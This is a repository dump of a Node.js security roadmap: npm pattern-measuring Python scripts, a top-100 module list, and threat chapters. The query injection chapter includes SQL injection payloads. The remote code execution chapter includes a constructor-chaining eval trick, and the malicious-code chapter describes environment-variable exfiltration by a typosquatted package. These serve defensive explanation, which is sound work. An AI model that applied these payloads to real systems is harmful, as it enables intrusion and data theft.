        print "| `%s` | %d | %d | %s |" % (
            v, count, total_count, quartiles)


================================================
FILE: appendix/lazy-load/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Looks for lazy loading patterns.

Patterns to identify include

  * { ... require(...)

"""

import json
import os.path
import py_common.npm
import re
import shutil
import sys


lazy_load_pattern = re.compile(
    r'[{][^}]*(?<![_$\w.])require\s*\(')

def find_lazy_load(node_modules, module_name):
    return py_common.npm.js_srcs_matching(
        node_modules, module_name, lazy_load_pattern,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    uses = 0
    total_count = 0
    has_lazy_load = {}
    for module_name in top100:
        js_srcs = find_lazy_load(node_modules, module_name)
        has_lazy_load[module_name] = js_srcs
        if len(js_srcs):
            uses += 1
        total_count += 1

    print (
"""
## Lazy loads {#lazy_load}

Lazy loading can complicate code bundling if care is not taken.

%d of %d = %1.02f%% contain a use of require inside a `{...}` block.
""" % (uses, total_count, (100.0 * uses) / total_count))


================================================
FILE: appendix/py_common/__init__.py
================================================
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


================================================
FILE: appendix/py_common/npm.py
================================================
"""
Utilities for mucking with NPM packages
"""

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json
import os
import os.path
import re
import subprocess
import sys
import tempfile

import jslex.jslex

def install_packages(*package):
    """
    Creates a temporary node_modules directory with the given packages
    and returns it.
    """
    tmp_dir = tempfile.mkdtemp()
    tmp_node_modules_dir = os.path.join(tmp_dir, 'node_modules')
    os.mkdir(tmp_node_modules_dir)
    subprocess.check_call([
        'npm', 'install', '--ignore-scripts', '--only=prod',
        '-g', '--prefix', tmp_node_modules_dir,
        '--'] + list(package))
    return tmp_node_modules_dir


def for_each_npm_package(node_modules_dir, f):
    """
    Calls f with each package directory path.

    Returns an object with the result of each call keyed by
    package name.

    For a dir tree like
       node_modules
         foo
           package.json
           ...
         bar
           package.json
           ...
         baz
           package.json
           ...
         .bin
           ...
    returns
        {
          'bar': f('node_modules/bar'),
          'baz': f('node_modules/baz'),
          'foo': f('node_modules/foo')
        }
    """
    result = {}
    for fname in os.listdir(node_modules_dir):
        if fname not in ('.', '..'):
            if os.path.isfile(os.path.join(node_modules_dir, fname, 'package.json')):
                result[fname] = f(os.path.join(node_modules_dir, fname))
    return result

def ignore_tools_that_can_run_early(module_name):
    """
    A module filter that filters out dependencies on modules that
    can be run during the bundling/validation process so are not strictly
    necessary at runtime.
    """
    return lambda mn: mn == module_name or not (
        mn.startswith('babel')
        or mn.startswith('eslint'))

_REQUIRE_RE = re.compile(r'(?<![\w.])require\s*[(]([^\)]*)')
_REL_REQUIRE_RE = re.compile(r'^[.][.]?/')

def js_srcs_almost_worst_case(node_modules, module_name, module_filter=None):
    """
    The set of JS & TS source files required by a module
    including those required by prod dependencies.

    This does not take into account TS imports.

    This is not entirely conservative.
    We make an optimistic assumption that a dynamic load,
    a require(x) where x is not a string literal, only
    loads files from the same module.
    This is not true, e.g. when bazel-core loads extension
    modules.
    These cross-module loads need not only load from prod
    dependencies, so assuming otherwise would not actually
    make us conservative either.

    Returns [('module', '/abs/path/to/src.js'), ...]
    """
    if module_filter is None:
        module_filter = lambda _: True
    js_files = set()
    unprocessed = [module_name]
    visited = set()
    while unprocessed:
        up_module_name = unprocessed.pop()
        if up_module_name in visited: continue
        visited.add(up_module_name)
        if not module_filter(up_module_name): continue
        rq = None
        try:
            rq = requires(node_modules, module_name)
        except:
            import traceback
            traceback.print_exc()
        if rq is not None and rq['upper']:
            js_files.update([(up_module_name, src) for src in rq['srcs']])
            unprocessed += rq['deps']
        else:
            #print >>sys.stderr, "Falling back to worst-case for %s required by %s" % (
            #    up_module_name, module_name)
            js_files.update([(up_module_name, src) for src in
                             js_files_under(
                                 os.path.join(node_modules, up_module_name))
                             if not probable_non_prod_file(src)])
            package_json = None
            try:
                package_json = json.loads(
                    file(os.path.join(node_modules, up_module_name, 'package.json'), 'r')
                    .read())
            except:
                print >>sys.stderr, "Undeclared dependency %s" % up_module_name
            if package_json is not None:
                unprocessed += package_json['dependencies'].keys()
    return tuple(sorted(js_files))

def requires(node_modules, module_name):
    """
    Follows require() calls to bound the set of JS files in a module.

    Returns {
      'srcs': [...],  # main.js and same-module files required thereof
      'deps': [...],  # required modules
      'upper': True,  # True when srcs and deps accounts for all require calls.
    }
    """
    module_root = os.path.join(node_modules, module_name)
    package_json = json.loads(
        file(os.path.join(module_root, 'package.json')).read())
    main_files = package_json.get('main', None)
    if type(main_files) in (str, unicode):
        main_files = (main_files,)
    if not main_files:
        return { 'srcs': (), 'deps': (), 'upper': False }
    srcs = set()
    deps = set()
    upper = True
    visited = set()
    unprocessed = [os.path.join(module_root, rp) for rp in main_files]
    while unprocessed:
        src = os.path.realpath(unprocessed.pop())
        if src in visited: continue
        visited.add(src)
        if os.path.isdir(src):
            for f in js_files_under(src):
                unprocessed.append(f)
        else:
            srcs.add(src)
            content = ''
            try:
                content = file(src, 'r').read()
            except:
                upper = False
            for match in _REQUIRE_RE.finditer(content):
                arg = match.group(1).strip()
                if not arg:
                    pass  # Zero arguments
                elif len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1]:
                    try:
                        arg = json.loads('"%s"' % arg[1:-1])
                    except:
                        #print >>sys.stderr, "Cannot parse require argument %s" % arg
                        upper = False
                    if _REL_REQUIRE_RE.match(arg):
                        if not arg.endswith('.js'): arg += '.js'
                        unprocessed.append(arg)
                    else:
                        deps.add(arg)
                else:
                    upper = False
    return {
        'srcs': tuple(sorted(srcs)),
        'deps': tuple(sorted(deps)),
        'upper': upper
    }

def js_files_under(root_dir):
    for dir_path, subdir_list, file_list in os.walk(root_dir):
        for f in file_list:
            if f.endswith('.js') or f.endswith('.ts'):
                yield os.path.join(dir_path, f)

def preprocess_js_content(content):
    """
    Preprocesses JS content to make it easier to operate on.

    All comments are replaced with spaces, and string literal
    content is upper-cased to make it easier to distinguish
    lower-case keywords and identifiers from similar content that
    appears inside a string literal.
    """

    lexer = jslex.jslex.JsLexer()
    canon_tokens = []
    for (tok_type, tok_content) in lexer.lex(content):
        if tok_type in ('comment', 'linecomment'):
            tok_content = ' '
        elif tok_type in ('regex', 'string'):
            tok_content = tok_content.upper()
        canon_tokens.append(tok_content)
    processed_content = ''.join(canon_tokens)

    return processed_content

def js_srcs_matching(node_modules, module_name, pattern, module_filter=None):
    """
    A list of srcs under root_dir whose content
    matches pattern.
    """

    srcs = js_srcs_almost_worst_case(
        node_modules=node_modules,
        module_name=module_name,
        module_filter=module_filter)

    matching_srcs = []
    for src in srcs:
        (_, path) = src
        canon_content = preprocess_js_content(file(path, 'r').read())
        match = pattern.search(canon_content)
        if match:
            matching_srcs.append(src)
    return matching_srcs

# by visual examination of
# `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
_NON_PROD_PATH = re.compile(
    r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|.github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])')
def probable_non_prod_file(path):
    """
    Skip probable non test files when falling back to directory scanning.
    """
    return _NON_PROD_PATH.search(path) is not None


================================================
FILE: appendix/test-code/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Looks for test code patterns under node_modules.

Patterns identify include

  * require('assert')
  * require('chai')
  * require('chai/*')
  * require('mocha')
  * require('should')
  * require('unexpected')

"""

import json
import os.path
import py_common.npm
import re
import shutil
import sys


test_code_pattern = re.compile(
    r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]|mocha|should|unexpected)[\'\"]')


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    uses = 0
    total_count = 0
    has_test_code = {}
    for module_name in top100:
        module_root = os.path.join(separate_modules, module_name)
        for js_file in py_common.npm.js_files_under(module_root):
            js_content = file(js_file, 'r').read()
            if test_code_pattern.search(js_content):
                uses += 1
                break
        total_count += 1

    print (
"""
## Prod bundle includes test code {#test_code}

Some of the top 100 modules are test code, e.g. mocha, chai.
This measures which modules, when installed `--only=prod` include
test patterns.

%d of %d = %1.02f%% contain test code patterns
""" % (uses, total_count, (100.0 * uses) / total_count))


================================================
FILE: appendix/top100.txt
================================================
async
babel-core
babel-preset-es2015
babel-runtime
bluebird
body-parser
chalk
cheerio
classnames
coffee-script
colors
commander
debug
express
fs-extra
glob
gulp
gulp-util
jquery
lodash
minimist
mkdirp
moment
prop-types
q
react
react-dom
request
rxjs
through2
underscore
uuid
webpack
winston
yargs
yeoman-generator
@angular/common
@angular/core
aws-sdk
axios
babel-loader
babel-polyfill
chai
co
core-js
css-loader
ejs
ember-cli-babel
eslint
handlebars
inquirer
joi
js-yaml
mocha
mongodb
mongoose
node-uuid
object-assign
optimist
ramda
react-redux
redis
redux
request-promise
rimraf
semver
shelljs
socket.io
superagent
xml2js
yosay
zone.js
@angular/compiler
@angular/forms
@angular/http
@angular/platform-browser
@angular/platform-browser-dynamic
@types/node
angular
autoprefixer
babel-eslint
babel-preset-react
bootstrap
cookie-parser
dotenv
es6-promise
eslint-plugin-react
extend
extract-text-webpack-plugin
file-loader
immutable
jade
jsonwebtoken
marked
mime
morgan
mysql
nan
node-sass
path
promise
react-router
style-loader
typescript
uglify-js
underscore.string
vue
ws


================================================
FILE: appendix/uses-scripts/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Collates how many projects use install scripts.

Per https://docs.npmjs.com/misc/scripts we look for the
following keys under "scripts" in package.json:

  * preinstall
  * install
  * postinstall
"""

import json
import os.path
import py_common.npm
import sys

def uses_scripts(package_root):
    package_json = json.loads(
        file(os.path.join(package_root, 'package.json')).read())
    scripts_obj = package_json.get('scripts', None)
    if scripts_obj is None:
        return False
    for script_type in ('preinstall', 'install', 'postinstall'):
        # TODO: True if empty value
        if script_type in scripts_obj: return True
    return False

if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    per_package = py_common.npm.for_each_npm_package(
        node_modules, uses_scripts)
    total_count = 0
    uses_scripts = 0
    for uses in per_package.itervalues():
        if uses:
            uses_scripts += 1
        total_count += 1
    print (
"""
## Uses Scripts {#uses_scripts}

Unless steps are taken, installation scripts run code on
a developer's workstation when they have write access to
local repositories.  If this number is small, having
humans check installation scripts before running might
be feasible.

%d of %d = %1.02f%% use installation scripts
""" % (uses_scripts, total_count, (100.0 * uses_scripts) / total_count))


================================================
FILE: book.json.withcomments
================================================
# Comments are stripped
{
    "root": ".",
    "structure": {
        "readme": "cover.md"
    },
    "title": "A Roadmap for Node.js Security",
    "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them.  Assumes a basic familiarity with JS & the Node ecosystem.",
    "author": "Mike Samuel et al",
    "language": "en",
    "gitbook": ">= 3.0.0",
    "plugins": [
        "links",
        "ga"
    ],
    "pluginsConfig": {
        # Google Analytics integration
        "ga": {
            "token": "UA-111883728-1",
            "configuration": {
                "anonymizeIp": true,
                "forceSSL": true
            }
        },
        "links": {
            "links": [
                {
                    # Adds a printer icon at the top.
                    # See styles/website.css for styling.
                    "label": "Printable",
                    # "icon" corresponds to a classname
                    "icon": "print-button",
                    # `make pdf` produces book.json which
                    # needs to be copied into _book/ for
                    # this to work.
                    # TODO: Point to an authoritative version
                    # via absolute URL once published.
                    "url": "/node-sec-roadmap.pdf"
                },
                {
                    "label": "Github",
                    "icon": "github-button",
                    "url": "https://github.com/google/node-sec-roadmap"
                }
            ]
        }
    }
}


================================================
FILE: chapter-1/recap.md
================================================
We've discussed the kinds of threats that concern us.

Next we discuss how some Node.js projects mitigate these threats today
and how we can make it easier for more Node.js projects to
consistently mitigate these threats.

Readers may find it useful to refer back to the [threat table][] which
cross-indexes threats and mitigation strategies.

[threat table]: threats.md#threat_table


================================================
FILE: chapter-1/threat-0DY.md
================================================
# Zero Day

When a researcher discloses a new security vulnerability, the clock
starts ticking.  An attacker can compromise a product if they can
weaponize the disclosure before the product team

*  realizes they're vulnerable, and
*  finds a patch to the vulnerable dependency, or rolls their own, and
*  tests the patched release and pushes it into production.

["The Best Defenses Against Zero-day Exploits for Various-sized
Organizations"][sans] notes

> Zero-day exploits are vulnerabilities that have yet to be publicly
> disclosed. These exploits are usually the most difficult to defend
> against because data is generally only available for analysis after
> the attack has completed its course.

> ...

> The research community has broadly classified the defense techniques
> against zero-day exploits as statistical-based, signature-based,
> behavior-based, and hybrid techniques (Kaur & Singh, 2014). The
> primary goal of each of these techniques is to identify the exploit in
> real time or as close to real time as possible and quarantine the
> specific attack to eliminate or minimize the damage caused by the
> attack.

Being able to respond quickly to limit damage and recover are
critical.

That same paper talks at length about *worms*: programs that
compromise a system without explicit direction by a human attacker,
and use the compromise of one system to find other systems to
automatically compromise.

Researchers have found ways ([details][saccone]) that worms
might propagate throughout `registry.npmjs.org` and common practices
that might allow a compromise to jump from the module repository to
large numbers of production servers.

If we can structure systems so that compromising one component
does not make it easier to compromise another component, then
we can contain damage due to worms.

If, in a population of components, we can keep susceptibility below a
critical threshold so that worms spend more time searching for targets
than compromising targets, then we can buy time for humans to
understand and respond.

If we prevent compromise of a population of modules by a zero day
from causing widespread compromise of a population of production
servers then we can limit damage to end users.

[sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562
[saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf


================================================
FILE: chapter-1/threat-BOF.md
================================================
# Buffer Overflow

A buffer overflow occurs when code fails to check an index into an
array while unpacking input, allowing parts of that input to overwrite
memory locations that other trusted code assumes are inviolable.
A similar technique also allows exfiltrating data like cryptographic keys
when an unchecked limit leads to copying unintended memory locations into
an output.

Buffer overflow vectors in Node.js are:

*  The Node.js runtime and dependencies like the JS runtime and OpenSSL
*  [C++ addons][] third-party modules that use N-API (the native API).
*  Child processes.  For example, code may route a request body to an
   [image processing library][imagetragick] that was not
   written with untrusted inputs in mind.

Buffer overflows are common, but we class them as low frequency for
Node.js in particular.  The runtime is highly reviewed compared to the
average C++ backend; C++ addons are a small subset of third-party
modules; and there's no reason to believe that child processes spawned
by Node.js applications are especially risky.

[imagetragick]: https://imagetragick.com/
[C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons


================================================
FILE: chapter-1/threat-CRY.md
================================================
# Weak Crypto {#CRY}

Cryptographic primitives are often the only practical way to solve
important classes of problems, but it's easy to make mistakes when using
`crypto.*` APIs.
Failing to identify third-party modules that use crypto (or should be
using crypto) and determining whether they are using it properly can lead
to a false sense of security.

["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel
notes:

> The field of cryptography is inherently difficult. Cryptographic API
> development involves narrowing a large, complex field into a small set
> of usable functions.  Unfortunately, these APIs are often far from
> simple.

> ...

> In 2013, study by Egele et al. revealed even more startling figures
> [1]. In this study, six rules were defined which, if broken, indicated
> the use of insecure protocols. More than 88% of the 11,000 apps
> analyzed broke at least one rule. Of the rule-breaking apps, most
> would break not just one, but multiple rules. Some of these errors
> were attributed to negligence, for example test code included in
> release versions. However, in most cases it appears developers
> unknowingly created insecure apps.

> ...

> The human aspect can be improved through better education for
> developers.  Sadly, this approach is unlikely to be a complete
> solution. It is unreasonable to expect a developer to be a security
> expert when most of their time is spent on other aspects of software
> design.

Code that uses cryptography badly can seem like it's working as intended
until an attacker unravels it.
Testing code that uses cryptographic APIs is hard.  It's hard to write
a unit test to check that a skilled cryptographer can't efficiently
extract information from a random looking string or compute a random
looking string that passes a verifier.

Weak cryptography can also mask other problems.  For example, a
security auditor might try to check for leaks of email addresses by
creating a dummy account `Carol <carol@example.com>` and
check for the string `carol@example.com` in data served in responses,
while recursing into substrings encoded using base64, gzip, or other
common encodings.
If some of that data is poorly encrypted, then the auditor might
falsely conclude that an attacker who can't break strong
encryption does not have access to emails.

[Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf


================================================
FILE: chapter-1/threat-DEX.md
================================================
# Poor Developer Experience

Security specialists have a vested interest in keeping developers
happy & productive.

Developer experience is not only a business or usability threat.  When
a team is less agile, it cannot respond as effectively to security
threats, or roll out interfaces that let end users manage their own
security and privacy.

Application developers may miss deadlines, cut features, or
compromise maintainability if any of the following are true:

*  starting a new project takes too long
*  they often cannot make progress until they get feedback from
   security specialists (or other specialists like I18N, Legal, UI)
*  repeated tasks are slow:
   *  restarting an application or service,
   *  running `npm install`, or
   *  rerunning tests after small changes
*  getting approval for a pull request takes long enough that
   upstream has to be manually merged into the branch.
*  breaking common code out of an application into an npm
   module becomes hard, so it is easier to copy-paste from one
   application to another
*  a developer has to spend significant time getting a release
   candidate approved instead of working on the next iteration.


================================================
FILE: chapter-1/threat-DOS.md
================================================

# Denial of Service

Denial of service occurs when a well-behaved, authorized user cannot
access a system because of misbehavior by another.

"Denial of service" is most often associated with [flooding][] a
network endpoint so it cannot respond to the smaller number of
legitimate requests, but there are other vectors:

*  Causing the server to use up [a finite resource][res-exh]
   like file descriptors causing threads to block.
*  Causing the target to issue a network request to an endpoint the
   attacker controls and responding slowly.
*  Causing the target to store malformed data which triggers an error
   in code that unpacks the stored data and causes a server to provide
   an error response to a well-formed request.
*  Exploiting event dispatch bugs to cause starvation
   ([example][disclosure]).
*  Supplying over-large inputs to super-linear (> O(n)) algorithms.
   For example supplying a crafted string to an ambiguous `RegExp`
   to cause [excessive backtracking][].

Denial of service attacks that exploit the network layer are usually
handled in the reverse proxy and we find no reason to suppose that
node applications are especially vulnerable to other kinds of denial
of service.

## Additional risk: Integrity depends on quick completion

A system requires [atomicity][] when two or more effects have to
happen together or not at all.  Databases put a lot of engineering
effort into ensuring atomicity.

Sometimes, ad-hoc code seems to preserve atomicity when tested under
low-load conditions:

```js
// foo() and bar() need to happen together or not at all.
foo(x);
// Not much of a gap here under normal conditions for another part
// of the system to observe foo() but not bar().
try {
  bar(x);
} catch (e) {
  undoFoo();
  throw e;
}
```

This code, though buggy, may be highly reliable under normal
conditions, but may fail under load, or if an attacker can cause
`bar()` to run for a while before its side-effect happens, for example
by causing excessive backtracking in a regular expression used to
check a precondition.

Some of the same techniques which makes a system unavailable can
widen the window of vulnerability within which an attacker can exploit
an atomicity failure.

Client-side, runaway computations rarely escalate into an integrity
violation since atomicity requirements are typically maintained on the
server.  Server-side, we expect that this problem would be more
common.

[flooding]: https://capec.mitre.org/data/definitions/125.html
[excessive backtracking]: https://www.regular-expressions.info/catastrophic.html
[res-exh]: https://capec.mitre.org/data/definitions/131.html
[disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug
[atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity


================================================
FILE: chapter-1/threat-EXF.md
================================================
# Exfiltration of Data

"Exfiltration" happens when an attacker causes a response to include
data that it should not have.  Web applications and services may
produce response bodies that include too much information.

This can happen when server-side JavaScript has access to more
data than it needs to do its job and either

*  it serializes unintended information and no one notices or
*  an attacker controls what is serialized.

Consider

```js
Object.assign(output, this[str]);
```

If the attacker controls `str` then they may be able to pick any field
of `this` or possibly any global field.

This problem is not new to Node.js but we consider this higher
frequency for Node.js for these reasons:

*  There is no equivalent to `Object.assign` in most backend languages.
   It's possible in Python and Java via reflective operators but
   security auditors can narrow down code that might suffer this vulnerability
   to those that use reflection.
   `Object.assign`, `$.extend` and similar operators are widely used in
   idiomatic JavaScript.
*  In most backend languages, `obj[...]` does not allow aliasing of all
   properties.
   For example, Python allows `obj[...]` on types that implement `__getitem__`
   which is not the case for user-defined classes.
   Java has generic collections and maps, but for user-defined classes
   the equivalent code pattern requires reflection and possibly calls to
   `setAccessible(true)`.

JavaScript makes it easier to alias properties and methods and common
JavaScript idioms make it harder for security auditors to narrow down
code that might inadvertently allow exfiltration.

`Object.assign` and related copy operators are also potential
[mass assignment][] vectors as in:

```js
Object.assign(systemData, JSON.parse(untrustedInput))
```

[mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability


================================================
FILE: chapter-1/threat-LQC.md
================================================
# Low Quality Code

An application or service is vulnerable when its security depends on a
module upholding a contract that it does not uphold.

Most new software has bugs when first released.  Over time, maintainers
fix the bugs that have obvious, bad consequences.

Often, widely used software has problem areas that are well understood.
Developers can make a pragmatic decision to use it while taking
additional measures to make sure those problems don't compromise
security guarantees.

Orphaned code that has not been updated recently may have done a
good job of enforcing its contract, but attackers may have discovered
new tricks, or the threat environment may have changed so it may
no longer enforce its contract in the face of an attack.

Low quality code constitutes a threat when developers pick a module
without understanding the caveats to the contract it actually
provides, or without taking additional measures to limit damage when
it fails.

It may be the case that there's higher risk of poorly understood
contracts when a community is experimenting rapidly as is the case for
Node.js, or early on before the community has settled on clear winners
for core functions, but we consider the frequency of vulnerabilities
due to low quality code in the npm repository roughly the same as for
other public module repositories.


================================================
FILE: chapter-1/threat-MTP.md
================================================
# Malicious Third-Party Code

Most open-source developers work in good faith to provide useful tools
to the larger community of developers but

*  Passwords are easy to guess, so attackers can suborn accounts that
   are only protected by a password.  On GitHub, developers may
   configure their accounts to require a
   [second factor][github-second-factor] but this is not yet the norm.
*  Pull requests that aren't thoroughly reviewed may dilute security
   properties.
*  Phishing requests targeted at GitHub users ([details][dimnie]) can
   execute code on unwary committers' machines.
*  A pull request may appear to come  from a higher-reputation source
   ([details][unsigned commits]).

Malicious code can appear in the server-side JavaScript running in
production, or can take the form of install hooks that run on a
developer workstation with access to local repositories and to
writable elements of `$PATH`.

Projects that deploy the latest version of a dependency straight to
production are more vulnerable to malicious code.  If an attacker
manages to publish a version with malicious code which is quickly
discovered, it affects projects that deploy during that short "window
of vulnerability."  Projects that `npm install` the latest version
straight to production are more likely to fall in that window than
projects that cherrypick versions or that shrinkwrap to make sure that
their development versions match deployed versions.

[Bower is deprecated][bower-depr] so our discussions focus on
`npmjs.org`, but it's worth noting that Bower has a single-point of
failure.  Anyone who can create a release branch can commit and
publish a new version.

[`npm profile`][npm profile] allows requiring
[two factor auth][npm auth-and-writes] for publishing and privilege
changes.  If the npm accounts that can publish new versions of a
package only checkout code from a GitHub account all of whose
committers use two factors, then there is no single password that can
compromise the system.

The frequency of malicious code vulnerabilities affecting Node.js is
probably roughly the same as that for other public module repositories.
The npm repo has been a target in the past [1][getcookies-disclosure]
[2][crossenv-typosquat-disclosure].

The [npm Blog][crossenv-typosquat-disclosure] explains what to do if
you believe you have found malicious code:

> On August 1, a user notified us via Twitter that a package with a
> name very similar to the popular `cross-env` package was sending
> environment variables from its installation context out to
> npm.hacktask.net. We investigated this report immediately and took
> action to remove the package. Further investigation led us to remove
> about 40 packages in total.
>
> ...
>
> Please do reach out to us immediately if you find malware on the
> registry. The best way to do so is by sending email to
> [security@npmjs.com](mailto:security@npmjs.com). We will act to
> clean up the problem and find related problems if we can.


[github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/
[bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/
[dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
[unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html
[npm profile]: https://docs.npmjs.com/cli/profile
[saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
[npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication
[getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies
[crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry


================================================
FILE: chapter-1/threat-QUI.md
================================================
# Query Injection

[Query injection][] occurs when an attacker causes a query sent to a
database or other backend to have a [structure][spp] that differs from
that the developer intended.

```js
connection.query(
    'SELECT * FROM Table WHERE key="' + value + '"',
    callback);
```

If an attacker controls `value` and can cause it to contain a single
quote, then they can cause execution of a query with a different structure.
For example, if they can cause

```js
value = ' " OR 1 -- two dashes start a line comment';
```

then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...`
which returns more rows than intended possibly [leaking](./threat-EXF.md)
data that the requester should not have been able to access, and may
cause other code that loops over the result set to modify rows other than
the ones the system's authors intended.

Some backends allow statement chaining so compromising a statement
that seems to only read data:

```js
value = '"; INSERT INTO Table ...  --'
```

can violate system integrity by forging records:

```js
' SELECT * FROM Table WHERE key="' + value + '" ' ===
' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" '
```

or deny service via mass deletes.

Query injection has a [long and storied history][hall-of-shame].

[Query injection]: http://bobby-tables.com/
[hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
[spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property


================================================
FILE: chapter-1/threat-RCE.md
================================================
# Remote Code Execution

Remote code execution occurs when the application interprets an
untrustworthy string as code.  When `x` is a string, `eval(x)`,
`Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript
engine's parser on `x`.  If an attacker controls `x` then they can run
arbitrary code in the context of the CommonJS module or `vm` context
that invoked the parser.

Sandboxing can help but widely available sandboxes have
[known workarounds][denicola-vm-run] though the [frozen realms][]
proposal aims to change that.

It is harder to execute remote code in server-side JavaScript.
`this[x][y] = "javascript:console.log(1)"` does not cause code to
execute for nearly as many `x` and `y` as in a browser.

These operators are probably rarely used *explicitly*, but some
operators that convert strings to code when given a string do
something else when given a `Function` instance.  `setTimeout(x, 0)`
is safe when `x` is a function, but on the browser it parses a string
input as code.

*  [Grepping](../appendix/experiments.md#grep-problems) shows the rate
   in the top 100 modules and their transitive dependencies by simple
   pattern matching after filtering out comments and string content.
   This analysis works on most modules, but fails to distinguish
   safe uses of `setTimeout` in modules that might run on
   the client from unsafe.
*  A [type based analysis](../appendix/experiments.md#jsconf) can
   distinguish between those two, but the tools we tested don't
   deal well with mixed JavaScript and TypeScript inputs.

Even if we could reliably identify places where strings are
*explicitly* converted to code for the bulk of npm modules,
it is more difficult in JavaScript to statically prove that
code does not *implicitly* invoke a parser than in other
common backend languages.

```js
// Let x be any value not in
// (null, undefined, Object.create(null)).
var x = {},
// If the attacker can control three strings
    a = 'constructor',
    b = 'constructor',
    s = 'console.log(s)';
// and trick code into doing two property lookups
// they control, a call with a string they control,
// and one more call with any argument
x[a][b](s)();
// then they can cause any side-effect achievable
// solely via objects reachable from the global scope.
// This includes full access to any exported module APIs,
// all declarations in the current module, and access
// to builtin modules like child_process, fs, and net.
```

Filtering out values of `s` that "look like JavaScript" as they reach
server-side code will probably not prevent code execution.
[Yosuke Hasegawa][Yosuke] how to reencode arbitrary JavaScript using
only 6 punctuation characters, and that number may
[fall to 5][Masato].  ["Web Application Obfuscation"][obfusc] by
Heiderich et al. catalogues ways to bypass filtering.

`eval` also allows remote-code execution in Python, PHP, and
Ruby code, but in those languages `eval` operators are harder to
mention implicitly which means uses are easier to check.

It is possible to dynamically evaluate strings even in statically
compiled languages, for example, [JSR 223][] and
[`javax.compiler`][dynjava] for Java.  In statically compiled
languages there is no short implicit path to `eval` and it is not
easier to `eval` an untrusted input than to use an intepreter that is
isolated from the host environment.

We consider remote code execution in Node.js lower frequency than for
client-side JavaScript without a Content-Security-Policy but higher
than for other backend languages.  We consider the severity the same
as for other backend languages.  The serverity is higher than for
client-side JavaScript because backend code often has access to more
than one user's data and privileged access to other backends.

[denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0
[frozen realms]: https://github.com/tc39/proposal-frozen-realms
